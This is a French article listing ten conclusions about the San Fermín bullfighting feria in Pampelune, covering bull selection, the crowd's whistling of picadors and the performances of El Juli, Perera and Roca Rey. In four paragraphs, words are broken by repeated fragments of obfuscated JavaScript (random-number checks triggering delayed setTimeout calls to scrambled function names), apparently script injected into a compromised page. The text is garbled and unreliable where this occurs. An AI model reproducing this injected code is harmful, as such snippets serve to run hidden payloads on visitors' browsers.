CONCLUSIONS DE SAN FERMIN

1 Si l’on choisit le toro pour la dimension de ses cornes et pour sa hauteur il est pratiquement impossible de le faire par note et par type. De là qu’à Pampelune il n’y ait eu qu’une dizaine de toros qui ont vraiment chargé. Mauvais pour la Corrida. 2 Si on siffle le picador par système, même s’il exécute bien la pique, cela doit être parce que le public ne comprend pas la mission attribuée à la pique en tauromachie.

3 Si tous les gradins au soleil ne regardent pas la corrida et vivent leur propre fiesta, on peut comprendre difficilement pourquoi ils vont aux arènes. C’est comme si à Rolandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and Garros les gens dansaient et buvaient alors que Federer et Nadal jouaient la finale.

4 Si quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and le torero se profile pour faire la mise à mort on le siffle toujours, même si c’est la suerte la plus dangereuse en tauromachie, le moins que puisse ressentir un aficionado c’est de l’étonnement.

5 Si dans ce contexte certains toreros se mettent à genoux ou s’entêtent à faire des passes inversées, on ne peut rien leur reprocher.

6 Si la meilleure faena de la Feria, celle de Miguel Angel Perera, achevée avec deux pinchazos et deux descabellos, ne mérita qu’une ovation, c’est que la fiesta a plus de poids que toréer.

7 Si El Juli, auteur de deux faenas au pouvoir époustouflant, sortit par la Grandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ande Porte, il n’y a qu’une seule raison : c’est un énorme torero.

8 Si Roca Rey a connu un immense succès et a toréé à Pampelune comme s’il se trouvait dans le patio de sa maison c’est qu’il s’agit bien de la naissance d’un nouveau phénomène sur la planète taurine.

9 Si les aficionados à l’ombre suivent la corrida, sourds aux cris de ceux qui se trouvent en face, ils imposent le respect. Mais il faut aussi s’enflammer quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}and ce qui se produit dans l’arène embrase les cœurs.

Et 10  A Pampelune, lors des encierros c’est la foule qui triomphe et aux arènes, les guichets. Rarement, la corrida.

Les commentaires sont fermés.